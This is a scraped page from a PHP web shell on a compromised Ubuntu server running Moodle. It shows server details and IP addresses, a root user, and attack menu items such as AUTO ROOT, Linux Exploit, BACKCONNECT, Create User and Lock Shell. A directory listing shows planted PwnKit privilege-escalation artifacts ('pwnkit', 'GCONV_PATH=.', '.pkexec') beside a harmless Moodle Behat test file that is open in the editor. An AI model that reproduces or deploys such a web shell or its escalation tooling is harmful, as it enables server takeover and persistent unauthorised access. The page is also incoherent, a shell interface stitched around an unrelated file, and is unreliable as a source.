Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
group /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
auto_creation.feature
8.61
KB
-rwxrwxrwx
behat_groups.php
3.61
KB
-rwxrwxrwx
create_groups.feature
7.28
KB
-rwxrwxrwx
delete_groups.feature
3.36
KB
-rwxrwxrwx
group_description_picture.feat...
5.89
KB
-rwxrwxrwx
groups_import.feature
6.57
KB
-rwxrwxrwx
id_uniqueness.feature
2.39
KB
-rwxrwxrwx
overview.feature
9.35
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
role_visibility.feature
2.46
KB
-rwxrwxrwx
update_groups.feature
6.43
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : group_description_picture.feature
@core @core_group Feature: The description and picture of a group can be viewed by students and teachers In order to view the description and picture of a group As a teacher I need to create groups and add descriptions and picture to them. Background: Given the following "courses" exist: | fullname | shortname | format | | Course 1 | C1 | topics | And the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | 1 | teacher1@example.com | | student1 | Student | 1 | student1@example.com | | student2 | Student | 2 | student2@example.com | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | | student1 | C1 | student | | student2 | C1 | student | @javascript @_file_upload Scenario: A student can see the group description and picture when visible groups are set. Teachers can see group details. Given I am on the "Course 1" "course editing" page logged in as "teacher1" And I set the following fields to these values: | Group mode | Visible groups | And I press "Save and display" And I navigate to "Users > Groups" in current page administration And I press "Create group" And I set the following fields to these values: | Group name | Group A | | Group description | Description for Group A | # Upload group picture And I upload "lib/tests/fixtures/gd-logo.png" file to "New picture" filemanager And I press "Save changes" And I press "Create group" And I set the following fields to these values: | Group name | Group B | And I press "Save changes" And I add "Student 1 (student1@example.com)" user to "Group A" group members And I add "Student 2 (student2@example.com)" user to "Group B" group members And I navigate to course participants And I click on "Student 1" "link" in the "participants" "table" And I click on "Group A" "link" And I should see "Description for Group A" # As teacher, confirm that group picture is displayed And "//img[@class='grouppicture']" "xpath_element" should exist And ".groupinfobox" "css_element" should exist And I set the field "type" in the "Filter 1" "fieldset" to "Groups" And I set the field "Type or select..." in the "Filter 1" "fieldset" to "Group B" And I click on "Apply filters" "button" And I click on "Student 2" "link" in the "participants" "table" And I click on "Group B" "link" And I should see "Student 2" in the "participants" "table" And ".groupinfobox" "css_element" should not exist When I am on the "Course 1" course page logged in as student1 And I navigate to course participants And I click on "Student 1" "link" in the "participants" "table" And I click on "Group A" "link" # As student, confirm that group description and picture is displayed Then I should see "Description for Group A" And "//img[@class='grouppicture']" "xpath_element" should exist And I am on the "Course 1" course page logged in as student2 And I navigate to course participants And I click on "Student 2" "link" in the "participants" "table" And I click on "Group B" "link" And I should see "Student 2" in the "participants" "table" And ".groupinfobox" "css_element" should not exist @javascript @_file_upload Scenario: A student can not see the group description and picture when separate groups are set. Teachers can see group details. Given I am on the "Course 1" "course editing" page logged in as "teacher1" And I set the following fields to these values: | Group mode | Separate groups | And I press "Save and display" And I navigate to "Users > Groups" in current page administration And I press "Create group" And I set the following fields to these values: | Group name | Group A | | Group description | Description for Group A | # Upload group picture And I upload "lib/tests/fixtures/gd-logo.png" file to "New picture" filemanager And I press "Save changes" And I press "Create group" And I set the following fields to these values: | Group name | Group B | And I press "Save changes" And I add "Student 1 (student1@example.com)" user to "Group A" group members And I add "Student 2 (student2@example.com)" user to "Group B" group members And I navigate to course participants And I click on "Student 1" "link" in the "participants" "table" And I click on "Group A" "link" And I should see "Description for Group A" # As teacher, confirm that group picture is displayed And "//img[@class='grouppicture']" "xpath_element" should exist And ".groupinfobox" "css_element" should exist And I set the field "type" in the "Filter 1" "fieldset" to "Groups" And I set the field "Type or select..." in the "Filter 1" "fieldset" to "Group B" And I click on "Apply filters" "button" And I click on "Student 2" "link" in the "participants" "table" And I click on "Group B" "link" And ".groupinfobox" "css_element" should not exist When I am on the "Course 1" course page logged in as student1 And I navigate to course participants And I click on "Student 1" "link" in the "participants" "table" And I click on "Group A" "link" And I should see "Student 1" in the "participants" "table" # As student, confirm that group description and picture are not displayed Then I should not see "Description for Group A" And "//img[@class='grouppicture']" "xpath_element" should not exist And ".groupinfobox" "css_element" should not exist When I am on the "Course 1" course page logged in as student2 And I navigate to course participants And I click on "Student 2" "link" in the "participants" "table" And I click on "Group B" "link" And I should see "Student 2" in the "participants" "table" And ".groupinfobox" "css_element" should not exist
Close